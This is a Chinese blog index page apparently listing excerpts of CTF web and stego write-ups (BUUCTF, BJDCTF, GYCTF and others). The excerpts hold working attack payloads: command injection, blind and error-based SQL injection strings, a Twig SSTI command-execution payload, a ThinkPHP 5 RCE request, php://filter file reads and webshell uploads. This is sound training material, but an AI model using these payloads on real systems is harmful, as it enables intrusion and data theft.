- 博客(54)
- 收藏
- 关注
RSS订阅原创 [BJDCTF 2nd]圣火昭昭-y1ng -wp
解压出来一张图片,在属性备注里发现key附上新佛曰解码网址http://hi.pcmoe.net/buddha.html根据提示去掉com发现key后,通过查看16进制未发现里面包含压缩包之类的,所以应该会是加密隐写。尝试一下,发现是outguess...
2020-09-05 19:47:26
859
1
原创 BJDCTF-ezphp -wp
打开环境,f12查看一下源码base32解码1nD3x.php访问一下页面出源码 <?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';echo "<br /><font color=red><B>This is
2020-08-26 20:54:34
311
原创 强网杯web部分wp
主动?ip=127.0.0.1|cat ls 使用内联执行Funhashhash1=0e001233333333333334557778889可绕过数组绕过ffifdyop构成万能密钥?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2&hash4=ffifdyopflag{y0u_w1ll_l1ke_h4sh}web辅助看到这个熟悉的替换,可以进行序列化字符逃逸class.php里面的几个函
2020-08-26 13:41:26
487
原创 [ACTF新生赛2020]base64隐写 -wp
解压后三个文件最后一个一张公众号的二维码,然后一个txt里一串base64,结合题目应该是base64隐写STJsdVkyeDFaR1U4YVc5emRISmxZVzArQ2c9PQ1=STJsdVkyeDFaR1U4YzNSeWFXNW5QZ289DQ==STJsdVkyeDFaR1U4WTNOMGNtbHVaejRLDV==STJsdVkyeDFaR1U4WTNOMFpHbHZQZ289DQ==STJSbFptbHVaU0J0WVhodUlEazVPUW89Dd==Q2c9PQ1=ZF.
2020-08-21 20:13:35
3579
原创 [BJDCTF2020]纳尼 -wp
下载下来一个gif一个txtgif打不开,txt里没啥用010打开gif看看很明显,没文件头,加给gif文件头47494638试试保存下来可以打开,然后发现是一张动图然后用stegsolve打开分离开是一段段base64
2020-08-21 11:24:11
331
原创 [GYCTF2020]FlaskApp -wp
打开后一个base64加密框在解密处容易输入一些东西会导致报错,还会出一部分源码@app.route('/decode',methods=['POST','GET'])def decode(): if request.values.get('text') : text = request.values.get("text") text_decode = base64.b64decode(text.encode()) tmp = "结.
2020-08-19 17:05:21
480
原创 [CISCN 2019 初赛]Love Math -wp
<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r'
2020-08-19 11:14:51
566
原创 [GYCTF2020]Ezsqli -wp
打开容器后可以看到一个提交框尝试一下发现可以进行bool盲注0^10^(ascii(substr((select database()),1,1))>0)可以比较顺利的查到库名give_grandpa_pa_pa_pafuzz后可以发现过滤了or,所以information_schema无法使用,但可以使用sys.schema_table_statistics_with_buffer代替id=0^(ascii(substr((select group_concat(table_nam.
2020-08-15 15:42:00
342
原创 [NPUCTF2020]ReadlezPHP -wp
查看一下源码(可以f12,也可以在页面边缘右键)发现源代码<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){
2020-08-14 11:05:31
575
原创 [GWCTF 2019]枯燥的抽奖 -wp
查看一下源代码有个check.php,访问一下(无脑扫的话大概率也能扫出来)xkcsYlwV6M<?php#这不是抽奖程序的源代码!不许看!header("Content-Type: text/html;charset=utf-8");session_start();if(!isset($_SESSION['seed'])){$_SESSION['seed']=rand(0,999999999);}mt_srand($_SESSION['seed']);$str_long1
2020-08-13 17:22:40
353
原创 [MRCTF2020]Ezpop -wp
Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; public
2020-08-06 16:36:32
294
原创 [BSidesCF 2020]Had a bad day -wp
发现有一个参数,考虑一下注入加个’单引号发现报错出现include(woofers’.php),怀疑有文件包含漏洞,用php协议读取一下内容index.php?category=php://filter/read=convert.base64-encode/resource=index看上面的报错可以知道,它在会帮参数自动添加.php,所以不需要自己加(加了后读不出东西,会报错,可以发现有两个php后缀,也可以发现问题)转码一下<?php $file = $_GET['catego.
2020-08-06 11:08:14
276
原创 [WUSTCTF2020]颜值成绩查询 -wp
改变参数stunum发现页面会发生变化。通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。写脚本跑一下:import requestsurl='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php'flag=''for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
2020-08-05 20:36:17
559
原创 [V&N2020 公开赛]CHECKIN -wp
from flask import Flask, requestimport osapp = Flask(__name__)flag_file = open("flag.txt", "r")# flag = flag_file.read()# flag_file.close()## @app.route('/flag')# def flag():# return flag## want flag? naive!# You will never find the thing
2020-08-05 17:21:13
241
原创 [BJDCTF 2nd]xss之光 -wp
打开容器就gungungun,其他啥也没有。扫目录扫出git泄露<?php$a = $_GET['yds_is_so_beautiful'];echo unserialize($a);源码就这么短短三行。一开始还想着是不是其他地方还会泄露另一部分源码,但是没找到。参考其他wp才知道是利用php的原生类进行XSS题目给的提示就是题目叫xss,说明需要xss。echo unserialize($a);可触发序列化中的魔术方法__toStringError适用于php7版本E
2020-08-04 17:08:27
452
原创 [MRCTF2020]PYWebsite -wp
查看源码发现一段前段验证,然后发现在目录下有一个flag.php提示验证在后端,所以前面那个前端验证没用(也正常,前端验证都可以直接修改)购买者的ip已经被记录,本地可以看到flag,那么使用xff或者client-ip伪造一下ip试试。bp抓包发现xff可以直接获得flag...
2020-08-04 09:39:43
1332
原创 [BJDCTF2020]Cookie is so stable -wp
经过测试,可以发现有ssti在源码出发现提示,说关注cookie登入后抓包发现user处就是注入点{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}可以利用已知payload进行命令执行,获得flag。漏洞利用请参考https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%..
2020-08-02 17:23:31
266
原创 [BJDCTF2020]ZJCTF,不过如此 -wp
打开容器,进行代码审计传入text和file参数,第一个可以用data伪协议绕过,然后接下来是一个文件包含,可以用php协议读取数据。无法直接打开提示的next.php,所以用php协议读一下。?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php读出的源码如下<?php$id = $_GET['id'];$_SESS.
2020-08-02 15:31:53
449
原创 [强网杯 2019]随便注&[GYCTF2020]Blacklist -wp
[GYCTF2020]Blacklist算是随便注的加强版,环境基本一致,不过blacklist禁掉了set和rename,所以随便注的两种常规方法都做不了。一样的堆叠注入,1';show databases;#1';show tables;#这里使用的新姿势就是handler …open.handler…open语句打开一个表,使其可以使用后续handler … read语句访问,该表对象未被其他会话共享,并且在会话调用handler … close或会话终止之前不会关闭也就是说可以直.
2020-08-01 18:58:26
708
原创 [SWPU2019]Web1 -wp
打开页面是一个登入框,考点并不在这里,随意注册一个非admin账号登入点击广告详细,在广告名处会引发二次注入进过一番尝试,发现过滤#等注释符,空格,or,extractvalue,updatexml也被过滤,无法使用报错注入。(fuzz的时候发现他申请的条数会有限制,只能手工试)使用/**/代替空格使用联合注入先确定列数,无法使用order by 只能手工一个个试,发现有22列。显示位在2,3处数据库名可以直接查询查表名时由于过滤or,所以information_schema无法使用。
2020-07-30 17:05:08
273
原创 [BJDCTF2020]Mark loves cat -wp
页面打开后长这样。扫描器扫一下,发现是git泄露。用githack提取一下flag.phpindex.php<?phpinclude 'flag.php';$yds = "dog";$is = "cat";$handsome = 'yds';foreach($_POST as $x => $y){ $$x = $y; }foreach($_GET as $x => $y){ $$x = $$y; }fo.
2020-07-30 10:48:39
357
原创 [HFCTF2020]EasyLogin -wp
打开网页出现如上登入框,可以发现login和register等并没有php等后缀,初步判断是js框架,f12可以看到app.js访问一下,提示是基于Node.js的koa框架,但是这个页面的代码并不是逻辑代码,用处不大。在注释里提示静态文件处理出现问题,那么可能会出现任意文件读取漏洞这里需要对koa框架的目录有一定的了解其中controllers目录是项目控制器存放目录:接受请求,处理逻辑访问controllers/api.js发现处理逻辑const crypto = require('.
2020-07-29 15:54:45
2241
原创 攻防世界warmup -wp
打开一个笑脸。查看源代码,提示source.php,打开发现代码<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't
2020-07-17 15:18:23
336
原创 极客大挑战easysql&[HCTF 2018]admin-wp
极客大挑战easysql使用报错注入最后的flag太长,无法显示全,用substr()分成两部分即可payload:check.php?username=1’and%20(extractvalue(1,concat(’~’,(select%20substr(password,25,50)%20from%20geekuser%20limit%203,1))))%23and%231%23...
2020-07-17 15:08:54
138
原创 [BJDCTF 2nd]简单注入 -wp
拿到题目,先扫一下目录发现有robots.txt,里面提示了一个hint.txt。select * from users where username='$_POST["username"]' and password='$_POST["password"]';有一条后台查询语句回到登入框处,尝试注入,发现加单双引号都被过滤fuzz一下长度为1414的都被过滤,包括select,and,=,等。很明显联合注入用不了,报错注入无回显也不行。考虑盲注。当username=admin&a.
2020-07-17 11:22:18
511
3
原创 bugku cookies欺骗-wp
打开容器,发现一大串字符串,发现他们是循环的,研究了一会什么都没发现(事实的确是字符串本身没有什么意义)上面有俩参数,解码一下是keys.txt,前面的line改0页面不变,改1发现页面改变。把key.txt改成index.php,发现该前面的参数为1出现代码,改2有不同的代码,结合参数名猜测是通过参数控制显示不同的行,后面还有很多,写个脚本跑一下import requestsurl='http://123.206.87.240:8002/web11/index.php?line=2&
2020-07-14 20:21:45
188
原创 攻防世界web新手练习区1-5
一右键无法查看直接f12二三robots.txt然后查看f1ag_1s_h3re.php四找备份index.php.bakz,size_16,color_FFFFFF,t_70)记事本打开五
2020-07-14 15:37:28
131
原创 攻防世界web进阶 upload-wp
打开容器,发现文件上传处经过测试,只有jpg格式文件可传。png,.htaccess ,phtml等都无法上传当各种方法都尝试过后还是没一点思路。参考他人wp才得知是文件名注入。(心里只有一句mmp)上传回显只有文件名,因此大概率存储进数据库的也是文件名,那么当你上传文件时,就会与数据库发生交互,可能产生sql注入。尝试注入,提交发现根本无回显,那肯定是出现了问题,说明注入的确是存在的select database()时发现select被过滤,这里用双写就可以绕过,同样被过滤的还有from.
2020-07-14 15:14:55
219
原创 攻防世界 shrine -wp
打开网址就是一堆代码右击查看源代码方面看些import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index(): return open(__file__).read()@app.route('/shrine/<path:shrine>')def shrine(shrine): de
2020-07-12 17:13:16
284
原创 [MRCTF2020]你传你马呢 -wp
一个上传框,php和phtml等不能传,发现可以传jpg,也可以传.htaccess文件思路就比较清晰了,传.htaccess文件,然后再传一张jpg图片马,就会被解析为php.htaccess无法直接上传,改Content-Type: image/jpeg就可以上传了,传成功同时还会出现上传路径,省事的很把我们的图片马传上去upload/de7a617af67d04960a345bd95c169b14/222a8.jpg用这个路径蚁剑连接就可以了...
2020-07-07 13:21:36
3709
原创 [极客大挑战 2019]HardSQL -wp
直接找注入,随便填写用户名密码,用户名处多加个引号,有报错加个or 1 #有过滤,抓个包fuzz一下等号,空格等被过滤发现可以用报错注入,空格可以用括号代替username=admin'or(extractvalue(1,concat('0x7e',version())))%23username=admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table
2020-07-04 22:28:58
666
原创 [BJDCTF 2nd]old-hack -wp
进入网站,看到提示,powered By THINKPHP5知道肯定与thinkphp5有关传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧)版本为50.0.23post提交_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /触发命令执行漏洞cat /flag...
2020-07-04 21:22:06
359
1
原创 [BUUCTF 2018]Online Tool -wp
打开网页可以看到代码,进行代码审计$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox);获取你的ip,然后进行加密,把MD5值输出,然后以这个值创建一个目录尝试一下127.0.0.1 ,发现调用nmap对输入的ip进行扫描$host = $_GET['host']; $ho.
2020-07-03 10:45:56
311
原创 [RoarCTF 2019]Easy Java -wp
打开容器后发现一个登入框,这里是可以登入的,存在弱口令admin,admin888但是登入没什么用点开help看到了熟悉的filename参数试了一下直接get传没什么用,换POST传输这个下载下来没什么用结合java,看一下WEB-INF/web.xml传filename=WEB-INF/web.xml打开发现下面有一个FlagController路径为:com.wm.ctf.FlagController接下来下载class文件进行反编译即可payload:filename=W
2020-07-01 10:45:57
201
原创 [BJDCTF2020]Easy MD5 -wp
页面上就一搜索框,无论提交什么都没回显,f12查看响应头有提示select * from ‘admin’ where password=md5($pass,true)提示了后台查询语句查看一下md5()函数的true参数和默认的输出不一样,百度一下MD5()true参数漏洞,发现可以找到ffifdyop字符串会造成漏洞·在本地环境试验ffifdyop,输出的开头是'or'6xxxxxx在数据库语句里就构成了select * from ‘admin’ where password= ''o.
2020-06-30 19:06:18
1368
1
原创 [ACTF2020 新生赛]Upload -wp
把鼠标移到灯泡处的时候发现上传处任意传了个文件上去,弹窗只能穿图片格式,本来是想抓个包看看,发现挂了代理还是会弹窗提示,意识到是前端过滤删除check就可以绕过了上传php文件发现还存在后端过滤把后缀改为phtml即可上传没其他过滤,直接上传一句话接下来蚁剑或菜刀连接即可...
2020-06-29 19:38:35
1471
原创 [BJDCTF 2nd]fake google -wp
打开后一个google搜索框,查看源码没什么,随便输入点东西搜索查看源码,提示ssti测试一下,存在ssti1 、获取字符串的类对象''.__class__2 、寻找基类''.__class__.__mro__3 、寻找可用引用''.__class__.__mro__[1].__subclasses__()在最后面发现模块引擎类型<class ‘jinja2.ext.Extension’>, <class ‘jinja2.ext._CommentFinder’
2020-06-29 11:01:24
216
1
原创 [网鼎杯 2018]Fakebook -wp
打开容器,发现页面里有注册页面和登入页面任意注册一个用户名,进行登入在blog处发现有xss,一开始研究了半天,然后卡住了,参考别人的wp才发现这道题跟xss没有半毛钱关系。。。view.php?no=1在这里是有注入点的加个引号报错还会爆出绝对路径发现union被过滤,但/**/union/**/可以绕过列名然后查看一下字段查询到data发现这里面是以序列化的形式储存的这道题的最关键还是是通过目录扫描发现有robots.txt,进而发现/user.php.bak其实还可以跑出有f.
2020-06-27 22:13:44
377
原创 [CISCN2019 华北赛区 Day2 Web1]Hack World -wp
可以在页面上看到提示,flag在flag表flag列里在查询0,1,2时会获得不同的回显,0回显:Error Occured When Fetch Result.1:Hello, glzjin wants a girlfriend2:Do you want to be my girlfriend?初步判断0字段应该不存在,1,2存在尝试输入or时发现被ban,我们可以fuzz一下长为482的都是不允许的可以发现select,from,where这些常用注入字符都可以使用题目过滤了双引号,导
2020-06-27 09:36:49
244
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人